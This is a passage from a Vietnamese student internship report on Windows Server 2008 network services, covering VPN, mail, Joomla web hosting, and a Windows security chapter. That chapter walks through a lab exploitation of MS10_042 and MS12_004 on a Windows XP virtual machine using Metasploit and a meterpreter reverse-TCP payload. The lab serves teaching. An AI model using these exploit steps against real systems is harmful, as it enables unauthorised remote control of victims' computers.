Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
2. Client xp 2.Trên máy ảo windows XP2. Trong hộp thoãi New Connection Wizard -> chọn Crea….
205Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Trong hộp thoãi New Connection Wizard -> Next.
Trong hộp thoãi New Connection Wizard -> Connect to the netword at my wordplace.-> Next.
206Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Trong hộp thoại New Connection Wizard -> nhập Company name : client 2 den vps -> Next.
Trong hộp thoại New Connection Wizard -> nhập Ip của vps: 14.0.21.222
207Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Trong hộp thoại New Connection Wizard -> chọn Anyone use-> Next.
Trong hộp thoại New Connection Wizard -> tick vào add… -> Fisnish.
208Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Sau khi hoàn thành nhập user name và password VPN vừa tạo.
Chuột phải vào VPN chọn Status.
209Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
VPS cấp cho ip Vpn là: 10.0.0.102
210Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
III. Kiểm tra.Tiến hành ping từ windows XP 1 qua windows XP 2 sẻ thông.
CHƯƠNG 14: MAIL TRÊN VPS.I. Cài đặt MDmoon v10.
Các bước cài đặt đã hướng dẫn trên localhost.
II. Cấu hình MDmoon v10.
1. khởi động MDmoon v10Start -> Programs -> MDmoon -> Start MDmoon.
211Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
2. Kiểm tra Domain.Vào Setup -> Default Domain / Servers…
212Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Tick vào domain -> kiểm tra.
3. Tạo Account.Account -> name: thuhien-> Email : [email protected] -> password -> ok
213Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
4. Kiểm tra.
Vào trình duyệt web đăng nhập nguyenthithuhien.tk:3000.
Tạo mail tiến hành gửi qua gmail. [email protected]
214Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Vào gmail kiểm tra xem có nhận được hay chưa
215Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Đã nhận được -> tiến hành gửi lại ->Ok
216Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
CHƯƠNG 15: WEB TRÊN VPS
I. Cài đặt.
1. Chạy xampp.Chạy file.exe -> run.
217Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Chọn Install.
218Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Sau khi chạy xong Running Apache voi MySql -> tick vào Admin.
219Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Nhập joomla vào chọn Creation.
Thành công
220Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
2. Tạo xampp.Copy source joomla pass vào hdots và đổi tên là Athena.
221Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
222Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
II. thiết kế web: nguyenthithuhien.tk/athenaVào trình duyệt web chạy: nguyenthithuhien.tk/Athena -> Ok
Chọn Next.
223Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
224Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Chọn Mysql, user name: root, Data…: Athena-> Next.
225Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Next.
Nhập web doanh nghiep, gmail, pass vào –> Next.
226Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Chọn Remote install… -> site.
Tạo thành công trang web nguyenthithuhien.tk/ Athena.
227Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
CHƯƠNG 16: THIẾT KẾ WEB BẰNG JOOMLA.
1. Cài đặt joomla.
Thử kiểm tra trên máy thật.
228Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
229Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
230Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
2. thiết kế trang chủ
231Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
232Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
233Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
234Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
235Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
3. Tạo template admin.
236Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Sau đó chọn view site. Truy cập vào trang Athena.
Ta vào lại localhost/administrator để tiếp tục công việc.
4. Tạo bài viết.
237Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Chọn new, điền đầy đủ thông tin vào. Copy phần giới thiệu từ trang Athena.edu.vn
vào.
Chon Save& close.
Chọn New
Tạo thư mục cho tin tức đào tạo. các thư mục tin tức công nghệ, video Athena cũng
làm tương tự.
238Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Chọn Save & close.
Trong các thư mục TIN TỨC ĐÀO TẠO … có các thư mục con.
Chọn new
239Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Save & close. Làm tương tự cho các thư mục khác.
5.Tạo menu.Tạo menu. Menu -> main menu.
240Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Vào Home. Điền các thông tin vào.
Sau đó save & new.
241Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Chọn Single Article. Sau đó điền đầy đủ thông tin vào.
242Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Vào Select change chọn giới thiệu trung tâm Athena.
Chọn Save & new. Vào select. Chọn Categery Blog cho Tin tức đào tạo…
243Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Chọn Save & new. Làm tương tự cho các thư mục khác.
6. Hướng dẫn đưa manu ra trang chủ.
244Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Truy cập vào localhost/athena
245Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
7. Cài đặt và hiển thị module trình diển ảnh.
246Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
247Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Tiến hành add a site vào.
248Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
249Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Chọn Save & close.
8. Cài đặt và hiển thị tin tức cập nhật.
Chọn Save.
250Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Save lại và truy cập trang chủ.
9. Cập nhật tin tức cho website.
251Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
252Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
253Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Chọn save. Truy cập vào trang chủ.
10. Cài đặt và hiển thị tin tức mới nhất.
254Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Tạo thư mục tiêu điểm.
255Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Chọn on all pages.
256Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Save lại. truy cập vào trang chủ.
11. Hiển thị doanh mục tin tức.
257Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
258Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
259Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Điền đầy đủ thông tin vào.
260Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Save & close. Truy cập vào xem trang chủ.
Lúc này chưa truy cập được. ta vào
Chọn disable
261Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Truy cập lại là vào được
12. Tạo thư mục hỗ trợ Online
262Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Save & close
263Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Truy cập vào trang chủ xem
13. Tạo thư mục địa chỉ cho Athena.
Chọn new
264Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Truy cập vào trang chủ.
Tham khảo video tại: http://www.youtube.com/watch?v=nCUZ-9DxMKc
CHƯƠNG 17: BẢO MẬT WINDOWS.
I. Khai thác lỗ hổng trên Windows XP với mã lỗi MS10_042Chuẩn bị 2 máy ảo: Windows XP (nạn nhân) và máy Back Track 5r3 (máy tấn công nạn nhân)
Trên máy Back Track cấu hình địa chỉ IP trong bài lab này cho máy là: 192.168.147.130
Trên máy Back track vào chương trình terminal và gõ lệnh msfconsole
265Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Tìm mã lỗi bằng công cụ metaploit bằng cách gõ lệnh search ms10_042
Sau khi seach được mã lỗi ta dùng lệnh use và copy mã lỗi đã tìm được.
Dùng lệnh show options để biết thêm các câu lệnh cần thiết.
266Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Dùng lệnh SRVHOST <địa chỉ ip máy backtrack>
Dùng lệnh set PAYLOAD windows/meterpreter/preverse_tcp
267Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Dùng lệnh set LHOST <ip backtrack>
Dùng lệnh exploit để tiến hành khai thác lỗi. Chú ý đường dẫn http://192.168.147.130:80/ nếu máy nạn nhân vào đường dẫn này sẽ bị hack.
Trở lại máy Windows XP. Kiểm tra địa chỉ IP máy XP. Với địa chỉ ip máy XP là 192.168.147.131.
Trên máy XP ta vào trình duyệt web và gõ đường dẫn http://192.168.147.130:80/
Trên máy XP tự động xuất hiện hộp thoại Help and Support.
268Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Trên máy Back Track bắt đầu nhận thấy có sự kết nối đến địa chỉ
269Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Và nhận thấy có địa chỉ kết nối vào. Và tạo phiên kết nối vào nó.
Trên máy back track ta gõ lệnh sessions để kiểm tra.
Dùng lệnh sessions –i 1
Dùng lệnh sysinfo để xem thông tin máy nạn nhân. Và như vậy ta đã khai thác thành công lỗ hổng MS10_042 trên máy XP.
270Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
II. Khai thác lỗ hổng bảo mật Win XP mã lỗi MS12_004Chuẩn bị 2 máy ảo: Windows XP (nạn nhân) và máy Back Track 5r3 (máy tấn công nạn nhân)
Trên máy Back Track cấu hình địa chỉ IP trong bài lab này cho máy là: 192.168.147.130
Trên máy Back track vào chương trình terminal và gõ lệnh msfconsole
Tìm mã lỗi bằng công cụ metaploit bằng cách gõ lệnh search ms12_004
271Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Sau khi seach được mã lỗi ta dùng lệnh use và copy mã lỗi đã tìm được.
Dùng lệnh show options để biết thêm các câu lệnh cần thiết.
Dùng lệnh SRVHOST <địa chỉ ip máy backtrack>
272Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Dùng lệnh set PAYLOAD windows/meterpreter/preverse_tcp
Dùng lệnh set LHOST <192.168.147.130>
Dùng lệnh exploit để tiến hành khai thác lỗi. Chú ý đường dẫn nếu máy nạn nhân vào đường dẫn này sẽ bị hack.
273Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Trở lại máy Windows XP. Kiểm tra địa chỉ IP máy XP. Với địa chỉ ip máy XP là 192.168.147.131.
Trên máy XP ta vào trình duyệt web và gõ đường dẫn
Trên máy XP tự động xuất hiện hộp thoại yêu cầu chạy Windows Media Player. Nếu chọn Run sẽ bị hack.
274Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Trên máy Back Track bắt đầu nhận thấy có sự kết nối đến địa chỉ
Và nhận thấy có địa chỉ kết nối vào. Và tạo phiên kết nối vào nó
Dùng lệnh sessions –i 1
Dùng lệnh sysinfo để xem thông tin máy nạn nhân. Và như vậy ta đã khai thác thành công lỗ hổng MS12_004 trên máy XP.
275Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
CHƯƠNG 18: KẾT LUẬN
I.Các kết quả đạt được.Sau khi tìm hiểu và triển khai các dịch vụ trên máy ảo VMWare và VPS em đã có kiến thức về:
- Nguyên lý cơ bản của hệ điều hành mạng, kiến thức về hệ thống mạng, có kỹ năng cần thiết để cài đặt, cấu hình hoàn chỉnh mạng doanh nghiệp cỡ vừa và lớn dựa vào Windows Server 2008.
- Hiểu về cấu trúc hạ tầng, thiết kế và quản trị hệ thống mạng, nhiệm vụ quản lý bao gồm việc điều hành và hỗ trợ hệ thống.
- Triển khai, thiết kế, quản lý và chuẩn đoán hỏng hóc cho một hệ thống mạng.- Có các kiến thức trên nền tảng công nghệ Windows Server 2008.
II. Kinh nghiệm thực tế Có cái nhìn thực tế về việc cấu hình, quản lý một hệ thống mạng của một doanh
nghiệp thông qua nền tảng.
Được trực tiếp tiếp xúc những công nghệ và thiết bị mà trước đây chỉ biết đến
thông qua sách vở.
Được vận dụng những kiến thức tiếp thu trên lớp vào công việc thực tế.
Bổ sung và trau dồi những thiếu sót về kiến thức trong quá trình học trên lớp.
Trực tiếp triển khai và cấu hình trên máy chủ ảo VPS.
Có kinh nghiệm trong việc khắc phục sự cố khi hệ thống gặp lỗi.
276Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
III. Hoàn thiện bản thân Các thành viên trong nhóm đã định hướng rõ ràng mục tiêu sắp tới sẽ làm.
Tự tin hơn trong việc giao tiếp với mọi người trong công việc.
Nâng cao khả năng làm việc nhóm cũng như khả năng tự bản thân giải quyết vấn
đề khó khăn gặp phải trong công việc.
IV. Các kiến thức được lĩnh hội Kiến thức thực tế về hệ thống mạng của doanh nghiệp.
Hiểu các thành phần công nghệ mạng doanh nghiệp vừa và nhỏ.
V. Kết luận.Nhìn chung các công việc em đã cơ bản hoàn thành, tuy nhiên sẽ còn nhiều thiếu sót, đa
phần là quá trình tự học. Vì thế mong Thầy cô, các bạn đánh giá và đưa ra những ý kiến
đóng góp để khắc phục và sữa chữa. Bênh cạnh trình độ chuyên mông cũng cần có những
kỹ năng mềm như kỹ năng giao tiếp, làm việc nhóm cũng hết sức quan trọng. Thực tập là
giai đoạn quan trọng của sinh viên, giúp sinh viên có cơ hội làm việc thực tế nhằm củng
cố kĩ năng, chuẩn bị cho giai đoạn làm việc thật sau khi tốt nghiệp. Trong quá trình thực
tập tại Trung tâm ATHENA, nhóm chúng em được tiếp xúc với một môi trường làm việc
chuyên nghiệp, các công nghệ, thiết bị,các mô hình thực tế... Qua đó nhóm học hỏi được
những kinh nghiệm nhất định và có những suy nghĩ đóng góp sau:
Về công việc: Để thiết kế và triển khai một hệ thống mạng cho một công ty, cần
có nhiều bộ phận phối hợp với nhau để thực hiện và hoàn thành dự án.
Về phát triển kỹ năng:Để các bộ phận có thể phối hợp tốt mỗi nhân viên cần có
những kỹ năng cơ bản để làm việc trong đội, nhóm:
o Làm việc nhóm: Kỹ năng làm việc nhóm là khả năng làm việc hiệu quả trong đội ngũ. Đó
là việc có thể sử dụng đúng người để có được kết quả tốt nhất và luôn sẵn sàng để có thể
lãnh đạo hoặc phối hợp làm theo.
o Tìm hiểu – thu thập thông tin: Quản lý thông tin là khả năng biết được nơi để có được
thông tin cần thiết - để tìm kiếm, định vị, và thu thập nó. Điều này có thể liên quan đến
việc sử dụng các nguồn lực khác nhau, cho dù chúng là từ những con người hoặc từ các
tài liệu trong thế giới rộng lớn của công nghệ
277Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
o Kỹ năng giải quyết vấn đề - Tính linh hoạt : Tính linh hoạt là khả năng thích nghi để giải
quyết công việc chúng ta gặp phải hàng ngày trong công việc lẫn đời sống riêng. Giải
quyết vấn đề là xác định vấn đề, nghiên cứu giải pháp và đưa ra những quyết định hiệu
quả.
Về công nghệ: với lợi thế là công ty hoạt động trong lĩnh vực công nghệ thông
tin ,ATHENA có hạ tầng CNTT hiện đại ,an toàn và thông suốt
VI. Tài liệu tham khảo.[1] www.youtube.com/channel/trojan-backdoor-athena
[2] http://www.youtube.com/Thang VoDo
[3] Barrie Dempster - Kerry Garrison, TrixBox Made Easy, Packt Publishing, 2006.
[4] Theodore Wallingford, VoIP Hacks, O'Reilly Media, 2006
[5] Paul Mahle, VoIP telephony with Asterisk, Mahler, 2004
[6] http:///www.voip-info.org
[7] http://google.com
[8] http://www.quantrimang.com
[9] http://thuvien-it.net
278Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008